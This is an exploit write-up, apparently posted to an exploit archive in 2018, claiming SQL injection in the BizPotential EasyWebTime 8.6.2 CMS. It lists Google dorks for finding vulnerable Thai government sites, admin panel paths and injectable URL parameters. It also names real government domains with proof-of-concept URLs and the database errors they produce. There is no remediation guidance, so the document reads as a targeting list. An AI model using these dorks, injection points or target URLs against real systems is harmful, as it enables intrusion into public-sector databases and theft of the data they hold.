################################################################################################# # Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : bizpotential.com ~ ewtadmin.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dorks : inurl:''/ewtadmin/'' site:go.th inurl:''/main.php?filename='' site:go.th inurl:''/ewtadmin/ewt/ccs/'' intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.'' intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved'' ################################################################################################# # Admin Control Panel Paths => /ewtadmin/index.php /ewtadmin82/ /ewtcommittee/index2331.php /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php # SQL Injection Exploit : /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection] /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection] /more_news.php?offset=[SQL Injection] /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection] ################################################################################################# # Webboard Exploit : /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard # Webboar Directory Path : /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# # Example Site => Thailand Government Chachoengsao Cooperative Auditing Office cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# Thailand Government Department of Mineral Sources # Example Sites => dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] => dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] => archive.is/bUcka # SQL Database Error => SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1 Thailand Government Office of Consumer Protection Board # ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3 Thailand Government Ministry of Culture and Cooperatives - Auditing Department # cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] => archive.is/a4XYx # SQL Database Error => Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101 SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################